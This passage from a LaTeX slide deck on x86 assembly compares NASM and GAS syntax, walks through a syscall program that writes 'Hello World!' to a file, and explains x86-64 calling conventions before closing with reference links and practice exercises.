\item Directives are not preceded by a dot {\ttfamily .}
\item Less prefixes/suffixes floating around, so source looks cleaner
\pause
\item Memory addresses are just plain symbol names
\item Memory dereferenced with brackets {\ttfamily [ ... ]}
\pause
\item Instruction size usually implied by registers used, but is made explicit when necessary with {\ttfamily byte, word, dword} keywords
\begin{itemize}
\item {\ttfamily mov [ebp-4], dword 42}
\end{itemize}
\vs
\pause
\item Indirect memory accesses spelled out as expressions
\begin{itemize}
\item AT\&T / GAS: {\ttfamily movl \%eax, -12(\%ebp, \%ecx, 4)}
\item Intel / NASM: {\ttfamily mov [ebp+ecx*4-12], eax}
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Side-by-side Hello World Syscall Example (example-hello-nasm.asm)}
\mvs \mvs
\begin{columns}[T]
\column{0.5\textwidth}
\begin{gascode*}{frame=single}
.section .text
.global _start
_start:
# open("foo", ...);
movl $0x05, %eax
movl $filename, %ebx
movl $0x41, %ecx
movl $0644, %edx
int $0x80
# fd in %eax -> %ebx
movl %eax, %ebx
# write(fd, ...);
movl $0x04, %eax
# fd in %ebx from above
movl $message, %ecx
movl $messageLen, %edx
int $0x80
# close(fd);
movl $0x06, %eax
# fd still in %ebx
int $0x80
\end{gascode*}
\column{0.5\textwidth}
\begin{nasmcode*}{frame=single}
section .text
global _start
_start:
; open("foo", ...);
mov eax, 5
mov ebx, filename
mov ecx, 0x41
mov edx, 0q644
int 0x80
; fd in eax -> ebx
mov ebx, eax
; write(fd, ...);
mov eax, 4
; fd in ebx from above
mov ecx, message
mov edx, messageLen
int 0x80
; close(fd);
mov eax, 6
; fd still in ebx
int 0x80
\end{nasmcode*}
\end{columns}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Side-by-side Hello World Syscall Example (example-hello-nasm.asm) Continued}
\mvs
\begin{columns}[T]
\column{0.5\textwidth}
\begin{gascode*}{frame=single}
# exit(0);
movl $0x01, %eax
movl $0x0, %ebx
int $0x80
.section .data
filename: .ascii "foo\0"
message: .ascii "Hello World!\n"
.equ messageLen, . - message
\end{gascode*}
\column{0.5\textwidth}
\begin{nasmcode*}{frame=single}
; exit(0);
mov eax, 1
mov ebx, 0
int 0x80
section .data
filename: db 'foo',0
message: db 'Hello World!',10
messageLen: equ $ - message
\end{nasmcode*}
\end{columns}
\vs
{\footnotesize Runtime:}
\begin{textcode}
$ nasm -f elf example-hello-nasm.asm -o example-hello-nasm.o
$ ld example-hello-nasm.o -o example-hello-nasm
$ ./example-hello-nasm
$ cat foo
Hello World!
$
\end{textcode}
\end{frame}
\section{Extra Topic 2: x86-64 Assembly}
\begin{frame}[fragile,t]
\frametitle{Immediate Differences}
\begin{itemize}
\item {\ttfamily \%eax} extended to 64-bit {\ttfamily \%rax}, along with \\
{\ttfamily \%rax, \%rbx, \%rcx, \%rdx, \%rbp, \%rsp, \%rsi, \%rdi}
\item Supplemental general purpose registers \\
{\ttfamily \%r8, \%r9, \%r10, \%r11, \%r12, \%r13, \%r14, \%r15}
\vs \vs
\item Good architectural changes
\begin{itemize}
\item Segmentation and hardware task switching wiped away
\item No-Execute bit in page table entries to enforce non-executable sections
\end{itemize}
\vs
\item A lot of q's instead of l's: {\ttfamily movq, pushq, addq}
\item Stack pushes and pops are all typically 8-byte / 64-bit values
\item {\small \url{http://en.wikipedia.org/wiki/X86-64#Architectural\_features}}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Different Calling Convention}
\begin{itemize}
\item System V ABI
\item \url{http://www.x86-64.org/documentation/abi.pdf}
\item Function Call Convention (Linux)
\begin{itemize}
\item Arguments passed in registers: {\ttfamily \%rdi, \%rsi, \%rdx, \%rcx, \%r8, \%r9}
\item Extra arguments pushed onto the stack
\item Function must preserve {\ttfamily \%rbp, \%rbx, \%r12 - \%r15}
\item Function can use rest of registers
\item Return value in {\%rax}
\end{itemize}
\item System Call Convention (Linux)
\begin{itemize}
\item Syscall number in {\ttfamily \%rax}
\item Arguments passed in registers: {\ttfamily \%rdi, \%rsi, \%rdx, \%r10, \%r8, \%r9}
\item Use {\ttfamily syscall} instruction
\item {\ttfamily \%rcx} and {\ttfamily \%r11} destroyed
\item Return value in {\%rax}
\end{itemize}
\end{itemize}
\end{frame}
\section{Resources and Next Steps}
\begin{frame}[fragile,t]
\frametitle{Essential Links}
\begin{itemize}
\item x86-32 + x86-64 instruction set: \\ \url{http://ref.x86asm.net/}
\item Official x86-32 + x86-64 architecture info: \\ \url{http://www.intel.com/content/www/us/en/processors/architectures-software-developer-manuals.html}
\item Unofficial x86-32 + x86-64 architecture info: \\ \url{http://sandpile.org/}
\item Linux System Call Reference: \\ \url{http://syscalls.kernelgrok.com/}
\item Assembly Optimization Tips: \\ \url{http://www.mark.masmcode.com/}
\item Interesting "assembly gems": \\ \url{http://www.df.lth.se/~john\_e/fr\_gems.html}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Going From Here}
\vspace{-0.5em}
\begin{itemize}
\item Play with the examples
\begin{itemize}
\item Modify Morse Encoder example to handle words ({\ttfamily morse.S})
\item Add find and remove to Linked List example ({\ttfamily linked\_list.S})
\item Modify Fibonacci to print with syscalls instead of {\ttfamily printf()}, ({\ttfamily fibonacci.S})
\item Write a recursive Fibonacci Sequence generator
\item Modify exploit shellcode to print a newline ({\ttfamily example-shellcode2.S})
\end{itemize}
\item Write your own syscall, e.g. rot13
\item Do Stack Smashing challenges: \\ {\footnotesize \url{http://community.corest.com/~gera/InsecureProgramming/}}
\item Rewrite a traditional *nix program in Assembly
\begin{itemize}
\item e.g. telnet: \\ {\footnotesize \url{https://github.com/vsergeev/x86asm/blob/master/telnet.asm}}
\item e.g. asmscan: \\ {\footnotesize\url{https://github.com/edma2/asmscan}}
\end{itemize}
\item Write assembly for microcontrollers like Atmel AVR, Microchip PIC, and ARM Cortex M series
\end{itemize}
\end{frame}
\section*{Lingering Questions?}
\end{document}